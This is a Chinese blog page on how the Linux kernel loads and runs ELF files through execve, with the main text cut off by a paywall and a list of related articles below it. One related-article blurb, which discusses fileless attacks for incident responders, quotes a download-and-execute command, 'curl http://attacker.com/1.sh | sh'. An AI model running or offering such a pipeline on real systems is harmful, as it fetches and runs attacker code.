Linux的执行elf可执行文件流程

已于 2023-07-05 15:41:56 修改
阅读量955 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: Linux内核 文章标签: linux Linux内核 elf运行流程
于 2023-07-05 15:41:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/G_linuxer_/article/details/131557131
execve族系统调用在Linux中用于运行新进程,替换当前进程的内存映像。execvp和execv是其变体,分别处理路径查找和执行。内核通过do_execveat_common函数调用elf加载器,解析ELF文件,设置参数并启动新进程,最终通过修改ARM的pc和sp指针执行程序。

execve族系统调用用于运行一个新的进程,并且替换当前进程的内存映像(代码,数据,栈)为新进程的内存映像。这个系统调用会在指定的进程空间内加载一个新的程序,同时将参数和环境变量传递给新程序。这个调用函数可以用于实现重载进程代码、切换用户权限、启动新的进程等功能。

execvp和execv是execve族的两个变体,它们允许你在新进程中运行可执行程序文件。 execvp使用PATH环境变量执行程序,而execv需要指定完整路径。

execve族的调用可以让用户免于开发自己的shell或者cli程序,用现有的程序交互式地对系统进行操作,甚至可以在shell中启动其他进程。

下面我们来跟踪一下Linux内核是如何实现该族函数的

内核中的定义

SYSCALL_DEFINE3(execve,
		const char __user *, filename,
		const char __user *const __user *, argv,
		const char __user *const __user *, envp)
{
	return do_execve(getname(filename), argv, envp);
}

SYSCALL_DEFINE5(execveat,
		int, fd, const char __user *, filename,
		const char __user *const __user *, argv,
		const char __user *const __user *, envp,
		int, flags)
{
	int lookup_flags = (flags & AT_E
了解本专栏 订阅专栏 解锁全文 超级会员免费看
Linux0.11代码分析】10 之 ELF执行程序03 - Program Headers解析
|~~~热爱生活、努力学习的小伙汁~~~|
05-22 862
Linux0.11代码分析】10 之 ELF执行程序03 - Program Headers解析
Linux启动ELF可执行文件的过程
-第二月-的专栏
08-27 3700
总结一下Linux内核启动一个ELF可执行文件的大概过程,其中大部分的细节都并没有深究过,但总的流程还算比较清楚。如果涉及到与体系结构有关的内容,只讲ARM的。 就从do_execve()函数开始讲起,因为无论是系统调用(即一个进程启动另一个进程)还是启动kernel线程(即系统自己决定启动一个进程,比如系统引导后由kernel启动的第一个进程init)都会调到这个函数。 do_execve(
Linux-ELF文件详解
05-21
很详细的一份针对于elf格式文件的技术文档,对于想更深层次的了解Linux的朋友们相信会有很大帮助的
如何在Linux ELF格式的文件(可执行binary,以及so文件)中定位到对应的函数位置
simaowebex的博客
12-16 3112
Linux ELF格式解析 https://en.wikipedia.org/wiki/Executable_and_Linkable_Format readelf -h (headers) readelf -l (segments program headers) readelf -S (sections) readelf -s (symbols) 一个ELF文件结构如下 如何定位一个函
使用C语言加载一个ELF格式可执行文件执行
qq_61585528的博客
02-15 1746
使用C语言加载一个ELF格式可执行文件执行
linux系统内存执行elf的多种方式
whatday的专栏
08-13 2114
一、前言 无文件(fileless)恶意软件攻击现在已经越来越流行,这一点并不奇怪,因为这种技术通常不会留下蛛丝马迹。本文的重点不是介绍如何在Windows RAM中执行程序,我们的目标是GNU/LinuxLinux是服务器行业的领头羊,在上百万嵌入式设备和大多数web服务上都能看到Linux的身影。在本文中,我们将简单探讨如何在Linux系统内存中执行程序,也讨论了如何应付具有挑战性的环境。...
Linux ELF文件装入与执行概述
余璜的技术博客
12-28 9284
ELFlinux中使用最广泛的一种应用程序格式,为了弄清楚Linux内核是如何讲ELF文件精确映射到指定内存空间,上周末把内核sys_execve部分好好看了一遍,小结如下:1. ELF格式ELF指定了进程中text段、bss段、data段等应该放置到进程虚拟内存空间的什么位置,以及记录了进程需要用到的各种动态链接库的位置。2. sys_execve的大致执行流程
【编译与链接技术】基于GCC和GNU binutils的可执行文件生成流程Linux模块加载机制解析
09-03
内容概要:本文详细介绍了程序从源代码到可执行文件的编译、链接与运行全过程,重点讲解了GCC编译器的使用方法、编译链接流程、静态库与动态库的处理机制、GNU binutils工具集的功能,以及Linux内核模块的加载机制。...
linux 可执行文件启动流程
zy562760942的博客
10-29 1447
linux ELF文件启动流程 一、背景 ​ 最近看了《linkers and loader》和以前学习《程序员的自我修养》,但是看了理解不是特别透,所以就想通过一个实际的案例来把了解到知识串起来,因此就想到把linux 识别和启动elf可执行文件流程梳理下,巩固自己所学。 二、内容 2.1 基础知识 ​ 无论是通过shell还是通过system函数的方式去调用新的命令,他底层的调用接口都是通过linux函数族实现的,linux主要的函数如下: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下
linux中的可执行二进制文件执行流程ELF
gzhu_flyingbird的博客
07-20 4935
LD_PRELOAD,execve,Linux
Linux 可执行文件 ELF结构 及程序载入执行
weixin_34362991的博客
03-14 236
    LinuxELF文件类型分为以下几种:    1、可重定位文件,比如SimpleSection.o;    2、可运行文件,比如/bin/bash。    3、共享目标文件,比如/lib/libc.so。    在Linux 可重定位文件 ELF结构一文中,我们已经分析了可重定位文件ELF结构。本文分析可运行文件ELF结构。    首先附上源码:    SectionMapping...
linux怎么运行elf文件,Linux 查看 elf可执行文件格式的两个命令
weixin_29266749的博客
04-28 4625
使用objdump 和readelf 两个命令,我们可以看到elf的各个节段的 信息还有 运行时需要那些动态链接库,elf中的汇编代码等等。 我就是想用来查看 这个elf运行需要哪些 *.so 文件#includeint test(){return 0;}int main(void){int i;int j =0;//printf ("sizeof (int)=%d\n",sizeof (int)...
Linux系统ELF程序的执行过程
eleven_xiy的博客
09-07 4119
[摘要] [正文]用后态执行 [正文]内核执行 [ELF文件加载] [实例] [动态库加载] [总结] 注意:请使用谷歌浏览器阅读(IE浏览器排版混乱) 【摘要】 本文将介绍linux程序的执行过程,并以实际问题为切入点简单介绍下ELF程序的加载过程。 【正文】用后态执行 我们知道在linux系统中可以通过诸如"./debug"方式执行一个程序,那么这个程序的执...
linux文件渗透执行elf
whatday的专栏
08-13 1450
01—简介 在进行Linux系统的攻击应急时,大家可能会查看pid以及/proc相关信息,比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令,通过/proc/$pid/exe抓样本等,但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢?最近看了一篇@MagisterQuis写的文章h...
Linux GCC常用命令和ELF文件格式
”一只特立独行的猪“的博客
10-15 963
Linux GCC常用命令和EFF文件格式一、各种工具(一)GCC编译工具(二)Binutils(三)C 运行库一、 C 语言程序 Hello.c示例(一)准备工作(二)编译过程1.预处理2.编译3.汇编4.链接(三)分析 ELF 文件1.ELF 文件的段 一、各种工具 (一)GCC编译工具 GCC(GNU C Compiler)是编译工具。本文所要介绍的将 C/C++语言编写的程序 转换成为处理器能够执行的二进制代码的过程即由编译器完成 (二)Binutils 一组二进制程序处理工具,包括:addr2
Linux ELF执行链接格式学习
洪伟的专栏
11-03 1717
ELF 是一种用于二进制文件可执行文件、目标代码、共享库和核心转储格式文件的格式。
Linux系统下ELF可执行文件的装载与执行
你是谁的博客
06-19 1024
本文内容参考自《程序员的自我修养——链接、装载与库》
Linux 下的可执行文件格式 ELF 全解析
m0_57836225的博客
12-12 1996
可重定位文件(Relocatable File):包含代码和数据,可以与其他目标文件合并,创建可执行文件或共享目标文件。例如,在编译过程中生成的.o文件就是可重定位文件可执行文件(Executable File):可以直接在系统上运行文件,包含了程序执行的入口点以及运行所需的代码和数据。共享目标文件(Shared Object File):也称为共享库,在程序运行时可以被动态加载和链接,多个进程可以共享同一个共享库,节省内存空间。例如,常见的.so文件就是共享目标文件
Linux是谁执行elf文件
最新发布
11-19
Linux 系统中,**ELF 文件是由内核(Kernel)直接加载并执行的**,但整个过程涉及多个组件协作完成。我们可以从用户输入命令开始,逐步拆解“谁”最终执行ELF 文件。 --- ### ✅ 最终答案: > **Linux 内核中的 ELF 解析器负责加载和启动 ELF 可执行文件**,而 `execve()` 系统调用是触发这一过程的关键机制。 但为了完整理解,我们来看整个流程是如何工作的: --- ## 🔧 执行 ELF 文件的全过程 假设你在终端运行: ```bash ./myprogram ``` 其中 `myprogram` 是一个 ELF 格式的可执行文件。 ### 步骤 1:shell 调用系统调用 `execve()` Shell(如 bash)会调用系统调用: ```c execve("./myprogram", argv, envp); ``` 这个系统调用将控制权交给 **Linux 内核**。 ### 步骤 2:内核读取文件头部,识别格式 内核首先读取文件的前几个字节(魔数): - ELF 文件的魔数是 `\x7fELF`(即十六进制 `0x7F 45 4C 46`) - 内核通过这个判断这是一个 ELF 文件 然后内核调用 **`load_elf_binary()`** 函数(定义在 `fs/binfmt_elf.c` 中)来处理该文件。 📌 这个函数属于内核的一部分,专门用于解析和加载 ELF 文件。 ### 步骤 3:内核设置内存布局,映射段(Segments) 内核根据 ELF 文件中的 **Program Headers** 做以下事情: - 分配虚拟内存空间 - 将 `.text` 段(代码)映射为只读+可执行 - 将 `.data` 段(数据)映射为可读写 - 设置栈空间 - 处理动态链接需求(如果存在 `INTERP` 段) 例如,如果程序使用了共享库(如 `libc.so`),则还需要启动 `dynamic linker`(如 `/lib64/ld-linux-x86-64.so.2`)。 ### 步骤 4:跳转到入口点(Entry Point) 最后,内核将 CPU 的指令指针(RIP 寄存器)设置为 ELF 头中指定的 **入口地址(e_entry)**,开始执行程序的第一条指令。 --- ## 📌 关键角色总结 | 组件 | 角色 | |------|------| | **用户进程(如 shell)** | 发起 `execve()` 系统调用 | | **系统调用接口 `execve()`** | 用户态与内核态之间的桥梁 | | **Linux 内核(`fs/binfmt_elf.c`)** | ✅ 真正执行 ELF 加载的核心部分 | | **动态链接器 `/lib/ld-linux.so`** | 如果是动态可执行文件,则由它解析依赖库(但它本身也是 ELF) | | **CPU** | 最终执行机器指令 | > 💡 所以说:“**是内核执行ELF 文件**”,更准确地说,是 **内核内置的 ELF 二进制处理模块** 完成了加载和启动。 --- ## 🧩 特殊情况说明 ### 1. 静态链接 ELF ```bash readelf -l my_static_program | grep INTERP ``` 如果没有输出,说明是静态链接,**不需要动态链接器**,内核直接加载后就跳转到入口点。 ### 2. 动态链接 ELF 如果有 `INTERP` 段: ``` [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2] ``` 那么内核会先加载这个解释器(它本身也是一个 ELF),然后把控制权交给它,由它加载主程序和共享库。 👉 类似于“接力”: ``` kernel → ld-linux.so → your_program(main) ``` 但这一切仍然是由内核启动的。 --- ## 🔍 查看一个 ELF 文件的信息示例 ```bash # 查看是否为 ELF file ./a.out # 输出:a.out: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, ... # 查看入口点 readelf -h ./a.out | grep "Entry point" # 输出:Entry point address: 0x401000 # 查看程序头(segments) readelf -l ./a.out ``` --- ## 🛠 内核源码参考(可选了解) 在 Linux 内核源码中,ELF 加载逻辑位于: ``` fs/binfmt_elf.c ``` 核心函数是: ```c static int load_elf_binary(struct linux_binprm *bprm) ``` 这是真正解析 ELF 并创建用户进程映像的函数。 --- ## ✅ 总结一句话: > **Linux 内核通过 `execve()` 系统调用识别并加载 ELF 文件,利用其内置的 ELF 解析器(`load_elf_binary`)完成内存映射和执行环境设置,最终将控制权交给程序入口点——因此,是内核执行 ELF 文件。** --- ### ❓相关问题❓: 1. `execve()` 系统调用的具体作用是什么?它和 `fork()` 有什么关系? 2. 如何编写一个最简单的 ELF 文件(手工构造)并在 Linux运行? 3. 当内核发现一个文件ELF 时,它是如何决定使用哪个二进制处理模块的? 4. 为什么有些 ELF 文件有 `PT_INTERP` 段?它的作用是什么?
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值